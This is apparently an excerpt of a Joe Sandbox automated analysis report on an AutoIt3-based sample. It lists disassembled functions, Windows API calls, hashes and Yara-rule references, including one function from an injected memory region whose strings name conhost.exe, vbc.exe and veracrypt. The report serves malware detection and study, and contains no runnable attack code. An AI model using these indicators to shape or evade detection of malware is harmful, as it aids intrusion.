                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: fa77aefd2924c862c24db53dcf9501f181031ed8c4c17cba4f53c6d19a3eb687
                                      • Instruction ID: 13606796db9c9dcd3295cfa24f14caab7d242a74290eb7218e3fa0f22e8778a0
                                      • Opcode Fuzzy Hash: fa77aefd2924c862c24db53dcf9501f181031ed8c4c17cba4f53c6d19a3eb687
                                      • Instruction Fuzzy Hash: BE31D034A40209AFCB10EF68C845EADB7B8FF44328F15802AE905D7395DB709D81CB91
                                      Function 00859B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00859BCC
                                      • GetDlgCtrlID.USER32 ref: 00859BD7
                                      • GetParent.USER32 ref: 00859BF3
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00859BF6
                                      • GetDlgCtrlID.USER32(?), ref: 00859BFF
                                      • GetParent.USER32(?), ref: 00859C1B
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00859C1E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: 79c59231efc55bbf551964f5d8554dd261c0e599190997f5f076bb45034ca61b
                                      • Instruction ID: 8dcecfa802a3bdb5a097480a5df750a8ad5df097551df1bc22cc75e1f37f98ca
                                      • Opcode Fuzzy Hash: 79c59231efc55bbf551964f5d8554dd261c0e599190997f5f076bb45034ca61b
                                      • Instruction Fuzzy Hash: 0A21B271A00204AFDF05EBA4CC85EFEBBA9FFA5311F100116FDA1D3291EB7559589A21
                                      Function 00859C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00859CB5
                                      • GetDlgCtrlID.USER32 ref: 00859CC0
                                      • GetParent.USER32 ref: 00859CDC
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00859CDF
                                      • GetDlgCtrlID.USER32(?), ref: 00859CE8
                                      • GetParent.USER32(?), ref: 00859D04
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00859D07
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: 98bd32b9f9cd61d76a55003518c17e438131a5c78cf34583d4fe08301a2de782
                                      • Instruction ID: 05cdf239cdc154694c6b0e0ec6afe349fb47efad5de0da0fed64563ccda77001
                                      • Opcode Fuzzy Hash: 98bd32b9f9cd61d76a55003518c17e438131a5c78cf34583d4fe08301a2de782
                                      • Instruction Fuzzy Hash: D921C171A00208BFDF11ABA4CC85EFEBBB9FF94300F100016FD51D3291EB754958AA20
                                      Function 00859D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32 ref: 00859D27
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00859D3C
                                      • _wcscmp.LIBCMT ref: 00859D4E
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00859DC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend_wcscmp
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1704125052-3381328864
                                      • Opcode ID: 3c1c66526a44604626fe71c79ea374e6be438f10d8d14ad809f195cc921bcdee
                                      • Instruction ID: 3967d41dc0ee613ea3862bb6b29064a16f6c41d4261305ce4164b4e9aac3b792
                                      • Opcode Fuzzy Hash: 3c1c66526a44604626fe71c79ea374e6be438f10d8d14ad809f195cc921bcdee
                                      • Instruction Fuzzy Hash: B1115977248326FEFA142664FC17DE677ACFB00362B200013FE20E41D1FF6A6A651951
                                      Function 00878F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00878FC1
                                      • CoInitialize.OLE32(00000000), ref: 00878FEE
                                      • CoUninitialize.OLE32 ref: 00878FF8
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 008790F8
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00879225
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00893BDC), ref: 00879259
                                      • CoGetObject.OLE32(?,00000000,00893BDC,?), ref: 0087927C
                                      • SetErrorMode.KERNEL32(00000000), ref: 0087928F
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0087930F
                                      • VariantClear.OLEAUT32(?), ref: 0087931F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                      • String ID:
                                      • API String ID: 2395222682-0
                                      • Opcode ID: 36469a420a7f9583b5983047d871070ea6d147ed74faea251db74353261b7c6b
                                      • Instruction ID: 28b43bc51a027ed1062c8cff5bc729ccedcaa59fb2d6c415bcaba21c9f7c8c62
                                      • Opcode Fuzzy Hash: 36469a420a7f9583b5983047d871070ea6d147ed74faea251db74353261b7c6b
                                      • Instruction Fuzzy Hash: A5C113B1608305AFD700EF68C88492AB7E9FF89348F04895DF99ADB251DB71ED05CB52
                                      Function 00867F4B Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00868027
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ArraySafeVartype
                                      • String ID:
                                      • API String ID: 1725837607-0
                                      • Opcode ID: 692768d4bafdb6707c68b3529a23d6f3e76ce96ac2d04a78d65c9edfb31df825
                                      • Instruction ID: 692d761d86bec148545f0f3784c454961755c99bc6a5aca1d494ad4bd4278afc
                                      • Opcode Fuzzy Hash: 692768d4bafdb6707c68b3529a23d6f3e76ce96ac2d04a78d65c9edfb31df825
                                      • Instruction Fuzzy Hash: 22B1C071A0061ADFDB00DF98D895BBEB7B4FF09325F264529E604E7281DB34A941CB91
                                      Function 008619CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 008619EF
                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00860A67,?,00000001), ref: 00861A03
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00861A0A
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00860A67,?,00000001), ref: 00861A19
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00861A2B
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00860A67,?,00000001), ref: 00861A44
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00860A67,?,00000001), ref: 00861A56
                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00860A67,?,00000001), ref: 00861A9B
                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00860A67,?,00000001), ref: 00861AB0
                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00860A67,?,00000001), ref: 00861ABB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 8d9ebf6d356b725d5f0789aa43858e5cda52a0f89901353ae54138e7978fa6a6
                                      • Instruction ID: cbc365c95df76e6d7a819f3696370c5d019bf676ac8960fbe40f56a8e7322a23
                                      • Opcode Fuzzy Hash: 8d9ebf6d356b725d5f0789aa43858e5cda52a0f89901353ae54138e7978fa6a6
                                      • Instruction Fuzzy Hash: C731BA71651218AFEF11AF90EC48FAA37BAFB6431AF1A411AF801C6191CFB49D40CF60
                                      Function 0083C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0080260D
                                      • SetTextColor.GDI32(?,000000FF), ref: 00802617
                                      • SetBkMode.GDI32(?,00000001), ref: 0080262C
                                      • GetStockObject.GDI32(00000005), ref: 00802634
                                      • GetClientRect.USER32(?), ref: 0083C0FC
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0083C113
                                      • GetWindowDC.USER32(?), ref: 0083C11F
                                      • GetPixel.GDI32(00000000,?,?), ref: 0083C12E
                                      • ReleaseDC.USER32(?,00000000), ref: 0083C140
                                      • GetSysColor.USER32(00000005), ref: 0083C15E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                      • String ID:
                                      • API String ID: 3430376129-0
                                      • Opcode ID: 11c4f018c9b5dfae91fa686f3d5e2957ea2e9e1816f32abb7dc68ba6b6c6b1db
                                      • Instruction ID: 07e9f9f46cf4a3ba7d600cf19d7c643c6eb1f073a7816e587a5b8f9d729a9138
                                      • Opcode Fuzzy Hash: 11c4f018c9b5dfae91fa686f3d5e2957ea2e9e1816f32abb7dc68ba6b6c6b1db
                                      • Instruction Fuzzy Hash: B7114C32500205BFDBA16FA4EC0CBA97BB1FF58321F144266FA66A50E1CB710951EF50
                                      Function 0080AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0080ADE1
                                      • OleUninitialize.OLE32(?,00000000), ref: 0080AE80
                                      • UnregisterHotKey.USER32(?), ref: 0080AFD7
                                      • DestroyWindow.USER32(?), ref: 00842F64
                                      • FreeLibrary.KERNEL32(?), ref: 00842FC9
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00842FF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: 9a215c44a92efb17f13ecd22f0b576898acf52ed7053fc81a079fcd1a8c158df
                                      • Instruction ID: a4fd5a79508ea35efd2270c53bf1999e92c4fb8e67f6eeb0cbf00c6183702b61
                                      • Opcode Fuzzy Hash: 9a215c44a92efb17f13ecd22f0b576898acf52ed7053fc81a079fcd1a8c158df
                                      • Instruction Fuzzy Hash: C0A16D707012168FCB69EF14C895A69F764FF04740F5442ADE90AEB292CF31AD56CF92
                                      Function 0085AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnumChildWindows.USER32(?,0085B13A), ref: 0085B078
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ChildEnumWindows
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 3555792229-1603158881
                                      • Opcode ID: 51eb63d71b12f01ec5d081b25e824944b40758c5663950af6436814713241498
                                      • Instruction ID: 940035ee1ffc151fcc14832e51c3b4ae4d09695e4bc7df6e473ea4c0e4f3faa7
                                      • Opcode Fuzzy Hash: 51eb63d71b12f01ec5d081b25e824944b40758c5663950af6436814713241498
                                      • Instruction Fuzzy Hash: 26918270500516AACB1CEFA4C481BEAFB75FF14305F508219ED5AE7251DF30699DCBA2
                                      Function 008031F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 0080327E
                                        • Part of subcall function 0080218F: GetClientRect.USER32(?,?), ref: 008021B8
                                        • Part of subcall function 0080218F: GetWindowRect.USER32(?,?), ref: 008021F9
                                        • Part of subcall function 0080218F: ScreenToClient.USER32(?,?), ref: 00802221
                                      • GetDC.USER32 ref: 0083D073
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0083D086
                                      • SelectObject.GDI32(00000000,00000000), ref: 0083D094
                                      • SelectObject.GDI32(00000000,00000000), ref: 0083D0A9
                                      • ReleaseDC.USER32(?,00000000), ref: 0083D0B1
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0083D13C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: 9ca2246c194e7a0f9f6e62a673a263fdcde69de04036afd55097e7e3ba640636
                                      • Instruction ID: 492cf6b77a6455bc9c1a3853b531a6a59f335ac775eeac40c01cb111133463d7
                                      • Opcode Fuzzy Hash: 9ca2246c194e7a0f9f6e62a673a263fdcde69de04036afd55097e7e3ba640636
                                      • Instruction Fuzzy Hash: BE712031400309EFCF25DF68DC84AAA7BB5FF89325F14426AED51DA2A6C7318841DFA0
                                      Function 03CEB314 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 179COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 03CEB3E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess
                                      • String ID: conhost.exe$explorer$lp.txt$proce$update$vbc.exe$veracrypt
                                      • API String ID: 2050909247-3686906338
                                      • Opcode ID: b83310e7ae9a8f47af29cfd07551eff70202ee91e9652debb6926789c352fd53
                                      • Instruction ID: 91c2892f2a42d37ddc06b1c504868c6e892703fd009d13685102deae81038344
                                      • Opcode Fuzzy Hash: b83310e7ae9a8f47af29cfd07551eff70202ee91e9652debb6926789c352fd53
                                      • Instruction Fuzzy Hash: 1D71493861436D8BDF25EB61CC90ADDB3B9EF44304F0181E5D958EB254EA70AF859F80
                                      Function 0088C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                        • Part of subcall function 00802714: GetCursorPos.USER32(?), ref: 00802727
                                        • Part of subcall function 00802714: ScreenToClient.USER32(008C77B0,?), ref: 00802744
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000001), ref: 00802769
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000002), ref: 00802777
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0088C69C
                                      • ImageList_EndDrag.COMCTL32 ref: 0088C6A2
                                      • ReleaseCapture.USER32 ref: 0088C6A8
                                      • SetWindowTextW.USER32(?,00000000), ref: 0088C752
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0088C765
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0088C847
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 1924731296-2107944366
                                      • Opcode ID: b58ab3155ec57b7f782be148cd01864e02e7f50332453991c5d359e8135b2d56
                                      • Instruction ID: ef749552c4afbbe258cb3cdd72ad714eca966e2766b2a6238a11b570f8694ff5
                                      • Opcode Fuzzy Hash: b58ab3155ec57b7f782be148cd01864e02e7f50332453991c5d359e8135b2d56
                                      • Instruction Fuzzy Hash: 66516970608205AFDB10EF18CC59FAA7BE5FB84310F04452DFAA5872E1DB70A955CF66
                                      Function 008720E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0087211C
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00872148
                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0087218A
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0087219F
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008721AC
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008721DC
                                      • InternetCloseHandle.WININET(00000000), ref: 00872223
                                        • Part of subcall function 00872B4F: GetLastError.KERNEL32(?,?,00871EE3,00000000,00000000,00000001), ref: 00872B64
                                        • Part of subcall function 00872B4F: SetEvent.KERNEL32(?,?,00871EE3,00000000,00000000,00000001), ref: 00872B79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                      • String ID:
                                      • API String ID: 2603140658-3916222277
                                      • Opcode ID: cbe22e3da34ae9a09bcdfcc5523d420a16c86d587ddbd66884ae561899dd6454
                                      • Instruction ID: f6650f313e65a51a8ed12c1ba627acf155859d977f3f71a567dca9a6fc8a9a73
                                      • Opcode Fuzzy Hash: cbe22e3da34ae9a09bcdfcc5523d420a16c86d587ddbd66884ae561899dd6454
                                      • Instruction Fuzzy Hash: 9C416DB1500208BEEB129F50CC85FBB7BACFF08364F048116FA19DA156D771EE449BA1
                                      Function 00879330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00890980), ref: 00879412
                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00890980), ref: 00879446
                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008795C0
                                      • SysFreeString.OLEAUT32(?), ref: 008795EA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                      • String ID:
                                      • API String ID: 560350794-0
                                      • Opcode ID: 9caba30c2372447a5514b9f6a09463a8c1247d7ccaa634fe471d7023974d7e9e
